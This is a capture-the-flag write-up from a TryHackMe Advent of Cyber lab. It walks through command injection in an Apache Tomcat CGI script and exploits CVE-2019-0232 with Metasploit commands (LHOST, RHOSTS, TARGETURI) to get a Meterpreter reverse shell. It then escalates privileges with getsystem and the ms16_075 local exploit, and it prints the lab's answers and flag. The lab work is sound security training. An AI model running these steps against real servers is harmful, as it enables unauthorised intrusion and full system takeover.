Day 12 - Ready, set, elf
Date: 12, December, 2020
Author: Dhilip Sanjay S
Learning Objectives
Common Gateway Interface (or) CGI
Standard means of communicating and processing data between a client such as a web browser to a web server.
CGI Scripts are stored in
/cgi-bin/
folder.Example:
systeminfo.sh
shows the date and time.
By adding
?&<command>
to the URL, you can check whether your command is executed and you get the output.For Linux-
ls
For Windows -
systeminfo
Note: Special characters will be URL Encoded
Solutions
What is the version number of the web server?
Answer: 9.0.17
Steps to Reproduce: Use
nmap
or visit<MACHINE_IP>:8080
on browser
What CVE can be used to create a Meterpreter entry onto the machine?
Answer: CVE-2019-0232 (Apache Tomcat - CGIServlet enableCmdLineArguments Remote Code Execution (Metasploit))
Steps to Reproduce:
Use
msfconsole
(Metasploit) or Exploit-DBSearch
Apache Tomcat 9.0
- For Windows
What are the contents of flag1.txt
Answer: thm{whacking_all_the_elves}
Steps to Reproduce:
msf6>
search apache tomcat 9.0
msf6>
use 0
set LHOST <Your_TryHackMe_IP>
set RHOSTS <MACHINE_IP>
set TARGETURI /cgi-bin/elfwhacker.bat
Verify the settings by typing
options
Type
run
. You'll get the Meterpreter shell.meterpreter>
shell
Now you'll get a shell on the Target machine
To view the flag -
type flag1.txt
Looking for a challenge? Try to find out some of the vulnerabilities present to escalate your privileges!
Privilege Escalation:
1. Usinggetsystem
commandBefore Escalation:
Escalation:
Post Esclation:
2. Using Local ExploitsIf
getsystem
fails:Run the command:
Only
exploit/windows/local/ms16_075_reflection
is used for privilege escalation.Move the current meterpreter to background.
Set the options along with
session
and then run the above mentioned exploit using the commandexploit
.Now you will get the shell with admin access.
Last updated